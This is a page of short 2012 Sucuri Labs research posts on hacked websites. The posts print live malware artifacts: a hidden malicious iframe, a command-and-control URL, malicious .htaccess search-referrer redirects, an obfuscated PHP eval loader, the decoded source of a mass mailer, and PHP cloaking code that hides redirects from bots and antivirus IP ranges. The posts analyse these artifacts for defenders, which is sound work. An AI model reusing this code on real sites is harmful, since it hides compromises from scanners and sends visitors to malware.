Category: Uncategorized

This is a simple way to know when a vulnerability in Plesk (or any other software) is being exploited in the wild:

When the mass scans for it starts. The data is from ISC (isc.sans.org) and shows a massive increase in thenumber of queries for port 8443 (used by Plesk).

Top malware entry for the day: poseyhumane.org/stats.php

<iframe src="http://poseyhumane.org/stats.php" name="Twitter"..
 scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

It seems to be the stats.php malware of the day. Related to our post here: Distributed Malware Network Outbreak Using Stats.php.

We also identified a CC (command and control server) for these infections: http://botstatisticupdate.com/stat/stat.php. More info to come soon.

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we areseeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://google.com [R=301,L]

.. lots of empty lines/ white spaces ...
ErrorDocument 404 http://google.com

We have no idea why this hapening. Maybe a bug in the attackers malware injection code, but we can\'t say for sure. We will post more details when we find out what is going on.

While looking at a compromised site, we found an interesting mass mailer in there. The contentwas encoded using eval/gzinflate and base64_decode:

<?php eval(gzinflate(base64_decode("1RprcxM58jtV/AehyyZ2rcdjOwkb7NjAhrBLFQGWhLvbAio1npFtLfNC.....</code></pre> <p>But when switching the "eval" for "print" we could see the mass mailer hidden and what it was doing:</p> <p><textarea cols=100 rows=20>$secure = "racrewmania@googlemail.com"; @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>rnReply-To: $replytorn"; $header .= "MIME-Version: 1.0rn"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uidrn"; If ($file_name) $header .= "--$uidrn"; $header .= "Content-Type: text/$contenttypern"; $header .= "Content-Transfer-Encoding: 8bitrnrn"; $header .= "$messagern"; If ($file_name) $header .= "--$uidrn"; If ($file_name) $header .= "Content-Type: $file_type; name="$file_name""rn""; If ($file_name) $header .= ""Content-Transfer-Encoding: base64rn""; If ($file_name) $header .= ""Content-Disposition: attachment; filename=""$file_name""rnrn""; If ($file_name) $header .= ""$contentrn""; If ($file_name) $header .= ""--$uid--""; mail($to</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 28, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1108 --> <article id="post-1109" class="post-1109 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/flagging-google-com-as-malware/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/flagging-google-com-as-malware/" rel="bookmark">Flagging google.com as malware</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Yesterday we listed <code>www.google.com</code> as being used for .htaccess conditional redirectionson hacked sites. Google does no evil, so what happened?</p> <p>We identified the source of the malware, which looks for certain user agents and IP addresses and redirects to <code>www.google.com</code> if it comes from them or to the real malware if not.</p> <p>This is the code:</p> <pre><code>$is_bot = FALSE ; $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', '#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', .. '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#ngb#i' ) ; $stop_ips_masks = array( "66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255 "65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255, "74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255 "67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255 "72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255 "38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255 "93\.172\.94\.227", // MacFinder "212\.100\.250\.218", // Wells Search II "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "193\.164\.202\.166", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "77\.193\.236\.225", "84\.155\.170\.196", "69\.174\.58\.36", "128\.103\.64\.[0-9]+", // StopBadWare "150\.70\.[0-9]+\.[0-9]+", // TrendMicro "216\.104\.[0-9]+\.[0-9]+", // TrendMicro "207\.46\.[0-9]+\.[0-9]+", // Microsoft "157\.55\.[0-9]+\.[0-9]+", // Microsoft "213\.180\.[0-9]+\.[0-9]+", // Yandex "217\.23\.[0-9]+\.[0-9]+", // Kaspersky "91\.103\.64\.[0-9]+", // Kaspersky "215\.5\.80\.[0-9]+", // Kaspersky "195\.168\.53\.[0-9]+", // NOD32 "117\.198\.48\.54", "110\.77\.248\.135", "87\.255\.51\.229", "206\.248\.243\.130", "124\.115\.6\.[0-9]+", "170\.252\.248\.[0-9]+", "217\.95\.225\.[0-9]+", "203\.17\.34\.[0-9]+", "220\.255\.1\.[0-9]+", // domain-tool.com "69\.28\.58\.[0-9]+", // Symantec "66\.231\.252\.[0-9]+", "126\.15\.99\.[0-9]+", "209\.128\.28\.[0-9]+", "91\.32\.55\.[0-9]+", "208\.72\.12\.[0-9]+", "84\.136\.88\.[0-9]+", "206\.80\.114\.[0-9]+", "24\.4\.75\.135", "66\.147\.244\.[0-9]+", // freepcsecurity.co.uk "128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu "209\.9\.239\.[0-9]+", // jsunpack.jeek.org "62\.67\.194\.[0-9]+", // support.clean-mx.de "195\.214\.79\.[0-9]+", // support.clean-mx.de "97\.74\.141\.[0-9]+", // malwareurl.com "213\.171\.194\.[0-9]+", // spamhaus "139\.146\.167\.[0-9]+", // malwaredomains "88\.160\.229\.[0-9]+", // malwaredomains "69\.162\.79\.[0-9]+", // malwarebytes "66\.40\.145\.[0-9]+", // bitdefender "66\.223\.50\.[0-9]+", // bitdefender "204\.14\.90\.[0-9]+", // spywarewarrior.com "92\.123\.155\.[0-9]+", // Sophos "213\.31\.172\.[0-9]+", // Sophos "143\.215\.130\.[0-9]+", // Malwaredomainlist "150\.70\.172\.[0-9]+", // TrendNet "64\.88\.164\.[0-9]+", // AVG "102\.157\.192\.[0-9]+", // ZeusTracker "109\.65\.41\.[0-9]+", // ZeusTracker "110\.77\.248\.[0-9]+", // Virustotal "59\.6\.145\.[0-9]+", // Virustotal "67\.124\.37\.[0-9]+", // Virustotal "80\.190\.117\.[0-9]+", // Virustotal "202\.190\.74\.[0-9]+", // Virustotal "209\.160\.33\.[0-9]+", // Virustotal "91\.121\.139\.[0-9]+", // Virustotal "85\.87\.104\.[0-9]+", // Virustotal "96\.50\.0\.[0-9]+", // Virustotal "220\.225\.0\.52" ); foreach ( $stop_ips_masks as $k=>$v ) { if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) ) $is_bot = TRUE ; } if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ) { header("Location: http://www.google.com/"); die(); }</code></pre> <p>So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc) and for a few IP addresses for bots and anti virus companies (Trend, Bitdefender, etc). If the requests arecoming from them, they ignore the connection and redirect to <code>www.google.com</code>.</p> <p>That\'s why we were seeing <code>www.google.com</code> and listed it on our malware dump (already fixed).</p> <p>For all the other users (the victims), the malware was contacting <code>http://88.198.28.38/api.php?action=link</code> to get the URL to redirect (generally in the .tk domain). Any questions, let us know.</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 21, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1109 --> <article id="post-1110" class="post-1110 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/strange-htaccess-redirections-to-msn-com/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/strange-htaccess-redirections-to-msn-com/" rel="bookmark">Strange .htaccess redirections to msn.com</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>We are seeing something very strange on a few compromised sites lately. Instead ofdoing .htaccess redirections to malware sites, the attackers added the malware to redirect users to msn.com.</p> <p>This is what we are seeing on some hacked sites (.htaccess file):</p> <pre><code>RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://msn.com [R=301,L] .. lots of empty lines/ white spaces ... ErrorDocument 404 http://msn.com</code></pre> <p>If you are not familiar with the .htaccess syntax, it is basically redirecting any users coming from searchengines (Google, Bing, Yahoo and even Twitter/Facebook) to msn.com instead of going to the real site.</p> <p>Anyone have ideas? It seems like a bug in the attackers malware injection code, but we can\'t say for sure. And no, we do not think Microsoft is behind those (conspiracy theory). 🙂</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 18, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1110 --> <article id="post-1111" class="post-1111 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/malware-from-thesea-org-media-php/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/malware-from-thesea-org-media-php/" rel="bookmark">Malware from thesea.org/media.php</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>We are seeing many sites compromised with malware from thesea.org/media.php. All siteshad the following added to the .htaccess file:</p> <pre><code>RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.thesea.org/media.php [R=301,L]</code></pre> <p>So far we detected more than 500 sites with this type of <a href="https://labs.sucuri.net/?details=www.thesea.org">redirection</a> in the last few days.</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 11, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1111 --> <nav class="navigation posts-navigation" aria-label="Posts"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://labs.sucuri.net/category/uncategorized/page/19/" >Older posts</a></div><div class="nav-next"><a href="https://labs.sucuri.net/category/uncategorized/page/17/" >Newer posts</a></div></div> </nav> </main><!-- #main --> </div><!-- #primary --> </div><!-- #content --> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div> <!-- /.container --> </div> </footer> </div><!-- #page --> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215" id="sucurikb-navigation-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215" id="sucurikb-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1" id="foundation-js-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1" id="sucuri-wp-custom-js-js"></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>